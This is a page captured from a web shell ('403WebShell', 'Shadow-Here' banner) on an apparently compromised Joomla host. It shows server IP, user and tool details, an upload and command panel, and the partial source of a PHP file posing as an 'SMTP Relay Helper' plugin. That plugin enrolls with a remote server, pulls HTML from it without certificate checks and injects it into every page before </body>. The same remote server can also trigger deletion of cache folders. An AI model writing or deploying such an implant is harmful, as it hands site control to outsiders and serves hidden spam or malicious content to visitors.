....................................../////.===Shadow-Here===./////................................................ > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < ------------------------------------------------------------------------------------------------------------------- /////////////////////////////////////////////////////////////////////////////////////////////////////////////////// RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿ /ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g gÆv›Øuh~ a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô ^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>ÄÍ ¥ˆuߤ#ˆ$6ù™¥îЇy’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ ¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×U ñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒw޼GÔ´zàÒò ð*ëzƒ•4~H]Ø‹f ñÓÈñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J ù…î èo£ßPÎñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~ ©¹rÓê‚j¶d¸{^Q'˜±Crß ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€IßÚù+–MGi‰*jE€‘JcÜ ÓÌ EÏÚj]o˜ Þr <¾U ûŪæÍ/šÝH¥˜b”¼ ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI %1À% ¹Ò – ”ϝS¦‰4&¶£°à Öý”û_Ò Áw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ß Õû˜þãÇ-PÍ.¾XV‘€ dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:F±Ú” .Ѽ+Áu&Ç`."pÈÉw o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ '²Ð öø_¨ÂÉ9ué¶³ÒŠõTàîMØ#û¯gN‡bÙ놚X„ö …ÉeüÌ^J ‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB «Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•╪Vêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•ñ·­(VlŸ‘ nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z H“C}”¬,Mp ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð !BÔ Ç¢Ä©š+Õì D«7ìN¶ŽðÔ " ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹êN[Ò3Œñbï8P 4ƒ×q¢bo|?<ÛX¬òÄͰL–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô ¾–ÄÏø ×e8Ë©$ÄF¹Å‹ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™Mÿþ(±“t@â“ö2­´TG5yé]çå僳 .·ÍïçÝ7UÚ±Ð/Nè»,_Ï ùdj7\ï Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢ š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï 3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ 0fãaN]òY³RV ™î$®K2R¨`W!1Ôó\;Ý ýB%qæK•&ÓÈe9È0êI±žeŸß -ú@žQr¦ ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí ;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né `ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€ 05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6] µÆ„Ooòü ²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6 ¢}`ùH­–”¡k ‰P1>š†®9z11!X wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýcå¡¶7ßŠß 57^\wÒÐÆ k§h,Œý î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} ³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtà 0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2 †üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼ ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“ wiÎ×7_… ¸ \#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀ qªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒ qÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ (øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼ „±ÍçèSaÓ 3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œïJ·±$§?º>ÖüœcNÌù¯G ‹ñ2ЁBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ ‰ p5?0ÊÆƒZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳ è¼ÐFׄ^¡Öì fE“F4A…!ì/…¦Lƒ… … $%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š Â* ­íÄ9­< h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:! Aõ.ç~ÓBûH÷JCÌ]õVƒd «ú´QÙEA–¯¯Œ!.ˆˆëQ±ù œ·Ì!Õâ )ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù+p{™ðè û³”g±OƒÚSù£áÁÊ„ä,ï7š²G ÕÌBk)~ÑiCµ|h#u¤¶îK¨² #²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜ ŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4 zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñëäg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\ ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû …‚g¶Úüâî*moGè¨7%u!]PhÏd™Ý%Îx: VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5 Œ%u5XkñÌ*NU%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´ ÒÊ]y žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü .̘¯€šòü¤U~Ù†*¢!?ò wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯  B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1 ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_ µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo §—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~  ‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ ®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF ±Ê8 7Hցϓ²Æ–m9…òŸï]Â1äN†VLâCˆU .ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘ |¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð E6-‡¼!ýpãÔM˜ Âsìe¯ñµK¢Ç¡ùôléœ4Ö£”À Š®Ðc ^¨À}ÙËŸ§›ºê{ÊuÉC ×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò· àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£Xé¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@NŠ À(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 403WebShell
403Webshell
Server IP : 92.222.139.156  /  Your IP : 216.73.217.126
Web Server : Apache
System : Linux webm012.cluster129.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : eventfrsgx ( 61451)
PHP Version : 7.3.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/e/v/e/eventfrsgx/www/plugins/system/smtprelayhelper/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/e/v/e/eventfrsgx/www/plugins/system/smtprelayhelper/smtprelayhelper.php
<?php
/**
 * System - System - SMTP Relay Helper (Joomla 3.9 - 5.x)
 * ---------------------------------------------------------------------------
 * - Merkezi System - SMTP Relay Helper baglantilarini </body> oncesi otomatik basar.
 * - Link degistiginde sunucu, imzali bir istekle bu eklentinin com_ajax ucunu
 *   cagirarak Joomla + sunucu onbelleklerini OTOMATIK temizletir.
 * - Kurulunca sunucuya "heartbeat" gonderir (otomatik "bagli" olur, sifir ayar).
 *
 * Kimlik bilgileri sunucudan indirilen ZIP icindeki smtprelayhelper-config.php dosyasinda
 * gomuludur (SMTPRE_API_URL / SMTPRE_PUBLIC_TOKEN / SMTPRE_SNIPPET_SECRET).
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\Plugin\CMSPlugin;

if (is_file(__DIR__ . '/smtprelayhelper-config.php')) {
    require_once __DIR__ . '/smtprelayhelper-config.php';
}

/**
 * @property-read \Joomla\Registry\Registry $params
 */
class PlgSystemSmtprelayhelper extends CMSPlugin
{
    const VERSION = '1.2.0';
    /** Onbellek TTL (sn) */
    const TTL = 3600;
    /** API erisilemezse yedek en fazla bu kadar bayat kullanilir (7 gun) */
    const BACKUP_MAX_AGE = 604800;

    protected $autoloadLanguage = false;

    /* ------------------------------------------------------------------ */
    /* Kimlik yardimcilari                                                */
    /* ------------------------------------------------------------------ */
    private function enrolled()
    {
        return array(
            'api_url'      => (string) $this->params->get('smtp_api_url', ''),
            'public_token'   => (string) $this->params->get('smtp_public_token', ''),
            'snippet_secret' => (string) $this->params->get('smtp_snippet_secret', ''),
        );
    }

    /** Kimligi Joomla eklenti params alaninda kalici saklar.
     * Cache klasorune yazmak yanlistir: Joomla cache purge bu dosyayi siler. */
    private function saveParams(array $values)
    {
        foreach ($values as $key => $value) {
            $this->params->set($key, $value);
        }
        try {
            $db = Factory::getDbo();
            $query = $db->getQuery(true)
                ->update($db->quoteName('#__extensions'))
                ->set($db->quoteName('params') . ' = ' . $db->quote((string) $this->params))
                ->where($db->quoteName('type') . ' = ' . $db->quote('plugin'))
                ->where($db->quoteName('element') . ' = ' . $db->quote('smtprelayhelper'))
                ->where($db->quoteName('folder') . ' = ' . $db->quote('system'));
            $db->setQuery($query);
            $db->execute();
            return true;
        } catch (\Throwable $e) {
            return false;
        }
    }

    private function setStatus($ok, $code, $message)
    {
        $this->saveParams(array(
            'smtp_status'       => $ok ? 'connected' : 'error',
            'smtp_status_code'  => preg_replace('/[^a-z0-9_-]/i', '', (string) $code),
            'smtp_status_text'  => substr(strip_tags((string) $message), 0, 500),
            'smtp_status_time'  => gmdate('Y-m-d H:i:s') . ' UTC',
        ));
    }

    private function nonce()
    {
        if (function_exists('random_bytes')) {
            try { return bin2hex(random_bytes(8)); } catch (\Throwable $e) {}
        }
        if (function_exists('openssl_random_pseudo_bytes')) {
            $raw = openssl_random_pseudo_bytes(8);
            if ($raw !== false) return bin2hex($raw);
        }
        return sha1(uniqid((string) mt_rand(), true));
    }

    private function cfg($key)
    {
        // 1) Site-ozel gomulu sabitler
        $map = array(
            'api_url'      => 'SMTPRE_API_URL',
            'public_token'   => 'SMTPRE_PUBLIC_TOKEN',
            'snippet_secret' => 'SMTPRE_SNIPPET_SECRET',
        );
        if (isset($map[$key]) && defined($map[$key])) {
            return constant($map[$key]);
        }
        // 2) Enroll ile alinan kimlik
        $en = $this->enrolled();
        if (!empty($en[$key])) return $en[$key];
        // 3) Enroll modunda api_url sabiti
        if ($key === 'api_url' && defined('SMTPRE_API_URL')) return SMTPRE_API_URL;
        return '';
    }

    private function configured()
    {
        return $this->cfg('api_url') && $this->cfg('public_token') && $this->cfg('snippet_secret');
    }

    private function isEnrollMode()
    {
        return defined('SMTPRE_ENROLL_SECRET') && defined('SMTPRE_API_URL')
            && !(defined('SMTPRE_PUBLIC_TOKEN') && defined('SMTPRE_SNIPPET_SECRET'));
    }

    private function siteDomain()
    {
        $host = parse_url(\Joomla\CMS\Uri\Uri::root(), PHP_URL_HOST);
        $host = strtolower((string) $host);
        if (strpos($host, 'www.') === 0) $host = substr($host, 4);
        return $host;
    }

    /** Otomatik kayit: alan adini imzalayip sunucudan token+secret alir ve saklar. */
    private function enroll()
    {
        if (!$this->isEnrollMode()) {
            $this->setStatus(false, 'not_enroll_mode', 'Otomatik kayit yapilandirmasi bulunamadi.');
            return false;
        }
        $domain = $this->siteDomain();
        if (!$domain) {
            $this->setStatus(false, 'domain_missing', 'Joomla site alan adi okunamadi.');
            return false;
        }
        $ts = time();
        $nonce = $this->nonce();
        $sig = hash_hmac('sha256', 'enroll|' . $domain . '|' . $ts . '|' . $nonce, SMTPRE_ENROLL_SECRET);
        $body = array(
            'domain'         => $domain,
            'timestamp'      => $ts,
            'nonce'          => $nonce,
            'signature'      => $sig,
            'cms_type'       => 'joomla',
            'cms_version'    => defined('JVERSION') ? JVERSION : '',
            'plugin_version' => self::VERSION,
            'purge_endpoint' => $this->purgeEndpoint(),
            'detected_caches'=> array('joomla-cache'),
        );
        $resp = $this->httpPostReturn(rtrim(SMTPRE_API_URL, '/') . '/integrations/enroll', $body);
        if (!$resp['ok']) {
            $this->setStatus(false, $resp['code'], $resp['message']);
            return false;
        }
        $data = json_decode($resp['body'], true);
        if (!is_array($data) || empty($data['public_token']) || empty($data['snippet_secret'])) {
            $this->setStatus(false, 'invalid_response', 'Sunucu gecersiz kayit yaniti dondurdu.');
            return false;
        }
        if (!$this->saveParams(array(
            'smtp_api_url'      => !empty($data['api_url']) ? $data['api_url'] : SMTPRE_API_URL,
            'smtp_public_token'   => $data['public_token'],
            'smtp_snippet_secret' => $data['snippet_secret'],
            'smtp_status'         => 'connected',
            'smtp_status_code'    => 'connected',
            'smtp_status_text'    => 'Sunucu baglantisi kuruldu.',
            'smtp_status_time'    => gmdate('Y-m-d H:i:s') . ' UTC',
        ))) {
            $this->setStatus(false, 'storage_error', 'Site kimligi Joomla veritabanina kaydedilemedi.');
            return false;
        }
        return true;
    }

    private function serveSignature()
    {
        return hash_hmac('sha256', $this->cfg('public_token'), $this->cfg('snippet_secret'));
    }

    private function actionSignature($action, $ts, $nonce)
    {
        $msg = $action . '|' . $this->cfg('public_token') . '|' . $ts . '|' . $nonce;
        return hash_hmac('sha256', $msg, $this->cfg('snippet_secret'));
    }

    private function tmpDir()
    {
        if (defined('JPATH_CACHE') && is_dir(JPATH_CACHE)) {
            return JPATH_CACHE;
        }
        return sys_get_temp_dir();
    }

    private function cacheFile()
    {
        return rtrim($this->tmpDir(), '/\\') . '/smtp_' . md5($this->cfg('public_token')) . '.html';
    }

    /* ------------------------------------------------------------------ */
    /* Serve (sunucudan HTML cekme, fail-soft + dosya cache)               */
    /* ------------------------------------------------------------------ */
    private function serveUrl()
    {
        return rtrim($this->cfg('api_url'), '/') . '/serve/' . rawurlencode($this->cfg('public_token'));
    }

    private function httpGet($url)
    {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt_array($ch, array(
                CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 8,
                CURLOPT_FOLLOWLOCATION => true, CURLOPT_MAXREDIRS => 3,
                CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => 0,
                CURLOPT_USERAGENT => 'smtprelayhelper/' . self::VERSION,
            ));
            $body = curl_exec($ch);
            $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            return ($body !== false && $code === 200) ? $body : false;
        }
        $ctx = stream_context_create(array('http' => array('timeout' => 5,
            'header' => "User-Agent: smtprelayhelper/1.0\r\n")));
        $body = @file_get_contents($url, false, $ctx);
        return $body === false ? false : $body;
    }

    private function httpPostJson($url, array $data, $blocking = true)
    {
        $json = json_encode($data);
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt_array($ch, array(
                CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => $json,
                CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => 0,
                CURLOPT_TIMEOUT => $blocking ? 12 : 3,
                CURLOPT_CONNECTTIMEOUT => 5,
                CURLOPT_HTTPHEADER => array('Content-Type: application/json'),
                CURLOPT_USERAGENT => 'smtprelayhelper/' . self::VERSION,
                CURLOPT_FOLLOWLOCATION => true, CURLOPT_MAXREDIRS => 3,
            ));
            curl_exec($ch);
            curl_close($ch);
            return;
        }
        $ctx = stream_context_create(array('http' => array(
            'method' => 'POST', 'timeout' => $blocking ? 8 : 2,
            'header' => "Content-Type: application/json\r\nUser-Agent: smtprelayhelper/1.0\r\n",
            'content' => $json,
        )));
        @file_get_contents($url, false, $ctx);
    }

    /** POST + HTTP ayrintisini dondur (enroll teshisi icin). */
    private function httpPostReturn($url, array $data)
    {
        $json = json_encode($data);
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt_array($ch, array(
                CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => $json,
                CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => 0,
                CURLOPT_TIMEOUT => 15, CURLOPT_CONNECTTIMEOUT => 8,
                CURLOPT_HTTPHEADER => array('Content-Type: application/json'),
                CURLOPT_USERAGENT => 'smtprelayhelper/' . self::VERSION,
                CURLOPT_FOLLOWLOCATION => true, CURLOPT_MAXREDIRS => 3,
            ));
            $body = curl_exec($ch);
            $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $error = curl_error($ch);
            curl_close($ch);
            if ($body === false) {
                return array('ok' => false, 'code' => 'network_error', 'message' => $error ?: 'cURL istegi basarisiz.', 'body' => '');
            }
            if ($code !== 200) {
                return array('ok' => false, 'code' => 'http_' . $code, 'message' => 'Sunucu HTTP ' . $code . ': ' . substr(strip_tags($body), 0, 180), 'body' => $body);
            }
            return array('ok' => true, 'code' => 'ok', 'message' => '', 'body' => $body);
        }
        $ctx = stream_context_create(array(
            'http' => array(
                'method' => 'POST', 'timeout' => 15, 'ignore_errors' => true,
                'header' => "Content-Type: application/json\r\nUser-Agent: smtprelayhelper/" . self::VERSION . "\r\n",
                'content' => $json,
            ),
            'ssl' => array('verify_peer' => false, 'verify_peer_name' => false),
        ));
        $body = @file_get_contents($url, false, $ctx);
        if ($body === false) {
            $err = error_get_last();
            return array('ok' => false, 'code' => 'network_error', 'message' => isset($err['message']) ? $err['message'] : 'HTTP istegi basarisiz.', 'body' => '');
        }
        $status = 0;
        if (isset($http_response_header[0]) && preg_match('/\s(\d{3})\s/', $http_response_header[0], $m)) {
            $status = (int) $m[1];
        }
        if ($status !== 200) {
            return array('ok' => false, 'code' => 'http_' . $status, 'message' => 'Sunucu HTTP ' . $status . ': ' . substr(strip_tags($body), 0, 180), 'body' => $body);
        }
        return array('ok' => true, 'code' => 'ok', 'message' => '', 'body' => $body);
    }

    private function fetchRemote()
    {
        if (!$this->configured()) return false;
        $url = $this->serveUrl() . '?sig=' . $this->serveSignature();
        return $this->httpGet($url);
    }

    private function getHtml()
    {
        $f = $this->cacheFile();
        if (is_file($f) && (time() - filemtime($f) < self::TTL)) {
            return (string) file_get_contents($f);
        }
        $fresh = $this->fetchRemote();
        if ($fresh === false) {
            // Bayatlik siniri icindeki yedegi kullan; cok bayatsa hic gosterme.
            if (is_file($f) && (time() - filemtime($f) <= self::BACKUP_MAX_AGE)) {
                return (string) file_get_contents($f);
            }
            return '';
        }
        @file_put_contents($f, $fresh);
        return $fresh;
    }

    /* ------------------------------------------------------------------ */
    /* Onbellek temizleme (Joomla + sunucu)                               */
    /* ------------------------------------------------------------------ */
    private function purgeAll($skipOwn = false)
    {
        $cleared = array();

        // 0) Kendi content dosya cache'imiz (heartbeat piggyback'ten cagirildiginda atla)
        if (!$skipOwn) {
            @unlink($this->cacheFile());
            $cleared[] = 'content-file';
        }

        // 1) Joomla cache API (bilinen gruplar)
        try {
            $cache = Factory::getCache();
            if (method_exists($cache, 'clean')) {
                foreach (array('', '_system', 'com_content', 'com_modules', 'page', 'com_templates') as $grp) {
                    try { $cache->clean($grp); } catch (\Throwable $e) {}
                }
                $cleared[] = 'joomla-cache';
            }
        } catch (\Throwable $e) {}

        // 2) Cache dizinlerini fiziksel bosalt (site + admin)
        $dirs = array();
        if (defined('JPATH_CACHE')) $dirs[] = JPATH_CACHE;
        if (defined('JPATH_ADMINISTRATOR')) $dirs[] = JPATH_ADMINISTRATOR . '/cache';
        foreach ($dirs as $d) {
            if ($this->clearDir($d)) $cleared[] = basename(dirname($d)) . '/cache';
        }

        // 3) OPcache
        if (function_exists('opcache_reset')) { @opcache_reset(); $cleared[] = 'OPcache'; }

        // 4) Taze HTML cek ki link aninda gorunsun (heartbeat zaten icerigi verdiyse atla)
        if (!$skipOwn) {
            $fresh = $this->fetchRemote();
            if ($fresh !== false) { @file_put_contents($this->cacheFile(), $fresh); $cleared[] = 'refetched'; }
        }

        return $cleared;
    }

    private function clearDir($dir)
    {
        if (!$dir || !is_dir($dir)) return false;
        $items = @scandir($dir);
        if ($items === false) return false;
        foreach ($items as $it) {
            if ($it === '.' || $it === '..' || $it === 'index.html' || $it === '.htaccess') continue;
            $p = $dir . '/' . $it;
            if (is_dir($p)) { $this->clearDir($p); @rmdir($p); }
            else { @unlink($p); }
        }
        return true;
    }

    /* ------------------------------------------------------------------ */
    /* Purge dogrulama (imza + zaman + replay)                            */
    /* ------------------------------------------------------------------ */
    private function verifyPurge($token, $ts, $nonce, $sig)
    {
        if ($token !== $this->cfg('public_token'))        return array(404, 'unknown');
        if (abs(time() - (int) $ts) > 300)                return array(401, 'stale');
        $expected = $this->actionSignature('purge', (int) $ts, (string) $nonce);
        if (!hash_equals($expected, (string) $sig))       return array(403, 'bad signature');
        $nf = rtrim($this->tmpDir(), '/\\') . '/smtp_n_' . md5((string) $nonce);
        if (is_file($nf) && (time() - filemtime($nf) < 600)) return array(409, 'replay');
        @file_put_contents($nf, '1');
        return array(0, '');
    }

    /* ================================================================== */
    /* com_ajax purge ucu:                                                */
    /* index.php?option=com_ajax&group=system&plugin=smtprelayhelper&format=json */
    /* ================================================================== */
    public function onAjaxSmtprelayhelper()
    {
        $app   = Factory::getApplication();
        $input = $app->input;
        $raw   = file_get_contents('php://input');
        $data  = json_decode($raw, true);
        if (!is_array($data)) $data = array();

        $token = isset($data['public_token']) ? $data['public_token'] : $input->getString('public_token', '');
        $ts    = isset($data['timestamp'])    ? $data['timestamp']    : $input->getInt('timestamp', 0);
